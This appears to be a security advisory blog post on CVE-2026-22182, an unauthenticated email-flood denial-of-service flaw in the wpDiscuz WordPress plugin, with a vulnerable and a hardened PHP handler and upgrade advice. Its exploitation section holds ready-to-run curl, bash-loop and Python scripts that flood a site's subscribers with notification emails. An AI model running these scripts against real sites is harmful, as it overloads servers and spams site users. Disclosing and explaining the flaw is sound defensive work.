If you’re using the wpDiscuz plugin for WordPress (version before 7.6.47), your website could be at risk of a denial of service (DoS) attack. Attackers can send repeated requests to a vulnerable AJAX endpoint, triggering the plugin’s mass notification system to send floods of emails to your site’s subscribers. This can overwhelm both your server and your subscribers’ inboxes.
This post breaks down the vulnerability (CVE-2026-22182) in plain language, shows sample exploitation, and provides links to further reading.
What Is wpDiscuz?
wpDiscuz is a popular WordPress plugin that enhances the native comment system, providing extra features like real-time comments, voting, and subscriber notifications.
Technical Details
The vulnerable code exposes an AJAX handler that lets anyone, without logging in, trigger notification emails. It does not check if a request is genuine—there is no nonce verification, no authentication, and no rate limiting.
The problem is in the way the plugin handles AJAX requests to
/wp-content/plugins/wpdiscuz/wpd-ajax.php
By sending specific parameters (postId, commentId, and an action parameter), the caller reaches the checkNotificationType() function. This routine is supposed to notify subscribers of a new comment—but _anyone_ can call it as many times as they want, for any post, and force the system to send mass emails.
The Vulnerable Code (Simplified Example)
Here’s a simplified snippet based on public disclosures. Imagine the wpdiscuz-ajax.php contains logic similar to this:

```php
<?php
// Vulnerable: NO nonce or auth check!
if ($_POST['action'] == 'wpc_check_notification_type') {
    $postId = intval($_POST['postId']);
    $commentId = intval($_POST['commentId']);
    // checkNotificationType triggers email notifications to every subscriber of the post
    checkNotificationType($postId, $commentId);
    // ...
}
```
- No authentication (anyone can call it)
- No CSRF/nonce check (no verification that the request is legitimate)
- No rate limiting (it can be called millions of times!)
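As an added illustration (not wpDiscuz's own code and not its actual fix), here is the same handler with the three missing controls in place, assuming the standard WordPress `wp_ajax_*` registration and a hypothetical nonce action name `wpd_notify` printed into the page with `wp_create_nonce()`:

```php
<?php
// Added example, not the plugin's patch. Registered only for logged-in users:
// with no wp_ajax_nopriv_ hook, anonymous callers get WordPress's default rejection.
add_action('wp_ajax_wpc_check_notification_type', 'hardened_check_notification_type');

function hardened_check_notification_type() {
    // 1. CSRF: the request must carry a nonce minted for this action;
    //    on failure check_ajax_referer() dies with a 403 before any work is done.
    check_ajax_referer('wpd_notify', 'nonce');

    // 2. Authorization: only comment moderators may fire notifications on demand.
    if (!current_user_can('moderate_comments')) {
        wp_send_json_error(['message' => 'forbidden'], 403);
    }

    $postId    = isset($_POST['postId'])    ? absint($_POST['postId'])    : 0;
    $commentId = isset($_POST['commentId']) ? absint($_POST['commentId']) : 0;

    // 3. Integrity: the comment must exist, be approved and belong to the given post,
    //    so arbitrary (postId, commentId) pairs from the request are rejected.
    $comment = get_comment($commentId);
    if (!$comment || (int) $comment->comment_post_ID !== $postId
        || $comment->comment_approved !== '1') {
        wp_send_json_error(['message' => 'invalid comment'], 400);
    }

    // 4. Idempotency: at most one notification round per comment, tracked in comment meta
    //    (the '_notified' key is a hypothetical name chosen for this example).
    if (get_comment_meta($commentId, '_notified', true)) {
        wp_send_json_success(['message' => 'already sent']);
    }

    // 5. Rate limit: at most 5 triggers per user per 10 minutes, counted in a transient.
    $key   = 'wpd_notify_rl_' . get_current_user_id();
    $count = (int) get_transient($key);
    if ($count >= 5) {
        wp_send_json_error(['message' => 'rate limited'], 429);
    }
    set_transient($key, $count + 1, 10 * MINUTE_IN_SECONDS);

    update_comment_meta($commentId, '_notified', 1);
    checkNotificationType($postId, $commentId); // the routine from the vulnerable snippet
    wp_send_json_success();
}
```

The transient counter is per user rather than per IP because the nonce and capability checks already exclude anonymous traffic; a per-IP counter in the same shape is the right choice for any endpoint that must stay reachable without login.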
---
Exploit Details: How Could an Attacker Abuse This?
An attacker just needs to send repeated POST requests to the AJAX endpoint, filling in arbitrary post and comment IDs. Each request triggers a batch of emails to all comment subscribers.
Example Exploit Request (using curl)

```bash
curl -X POST https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php \
  -d "action=wpc_check_notification_type&postId=1&commentId=1"
```

Imagine running this in a loop:

```bash
for i in {1..100}; do
  curl -s -X POST https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php \
    -d "action=wpc_check_notification_type&postId=1&commentId=1"
done
```
Result: Every POST triggers emails to all subscribers for the post. 100 requests could mean 100 rounds of mass emails. This can exhaust server resources, risk blacklisting your domain for spam, and annoy your users.
Demonstration Code (Python Example)
Below is an example script for educational purposes only. _Never attack live sites without permission!_
```python
import requests

target = 'https://targetsite.com/wp-content/plugins/wpdiscuz/wpd-ajax.php'
data = {
    'action': 'wpc_check_notification_type',
    'postId': 1,
    'commentId': 1,
}

for i in range(100):
    response = requests.post(target, data=data)
    print(f'Request {i+1}, Status Code: {response.status_code}')
```
- Subscriber rage: Thousands of unwanted emails can turn loyal users into angry critics.
- Blacklisting: Your domain/IP may be blocked for sending spam.
Update wpDiscuz:
Upgrade to version 7.6.47 or later ASAP. The developers have patched the handler to check permissions and nonces.
- Official plugin page: https://wordpress.org/plugins/wpdiscuz/
- CVE entry: CVE-2026-22182 *(might be pending public details)*
- wpDiscuz changelog: https://wordpress.org/plugins/wpdiscuz/#developers
- Vulnerability databases:
Final Thoughts
If you manage any WordPress sites with wpDiscuz installed, act quickly. Unauthenticated DoS-by-email is easy to exploit and can do real reputational and operational damage. Spread the word to anyone you know who runs WordPress forums or comment-heavy sites.
Stay safe out there and always keep your plugins updated.
Timeline
Published on: 03/13/2026 01:17:59 UTC